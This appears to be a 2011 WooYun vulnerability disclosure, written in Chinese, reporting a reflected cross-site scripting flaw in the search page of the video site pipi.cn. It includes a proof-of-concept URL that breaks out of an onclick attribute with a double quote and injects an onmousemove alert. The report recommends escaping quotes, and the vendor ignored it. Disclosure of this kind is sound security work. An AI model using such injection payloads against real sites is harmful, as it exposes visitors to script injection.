漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2011-01594
漏洞标题:皮皮网xss漏洞
相关厂商:皮皮网
漏洞作者: 冰雪风谷[NNU
提交时间:2011-03-14 19:09
修复时间:2011-03-19 21:00
公开时间:2011-03-19 21:00
漏洞类型:xss跨站脚本攻击
危害等级:低
自评Rank:1
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2011-03-14: 细节已通知厂商并且等待厂商处理中
2011-03-19: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
www.pipi.cn在搜索的地方,对搜索的内容过滤不全,导致xss.
详细说明:
搜索之后,会根据相关内容生成:
<a onclick="gotopage(1,'>','4',18,'','','','','','','',0,0)" href="javascript:void(0)" class="checked" id="search_all">全部(0)</a>
这个链接,我们发现我们输入的参数在gotopage()这个函数的第二个位置,并且将<>等HTML标签进行了转换,用双引号发现可以破坏这个结构。
漏洞证明:
用下述URL测试
http://www.pipi.cn/searchlist.html?cl=4&ie=UTF-8&tp=&stp=&la=&ar=&year=&ps=18&np=1&fm=off&q=%22onmousemove=alert%28/xss/%29;%22
插入图片地址:
修复方案:
对双引号转义
ps: 貌似提交XSS不给力啊,提交了N个都没有邀请码。
版权声明:转载请注明来源 冰雪风谷[NNU@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2011-03-19 21:00
厂商回复:
漏洞Rank:1 (WooYun评价)
最新状态:
暂无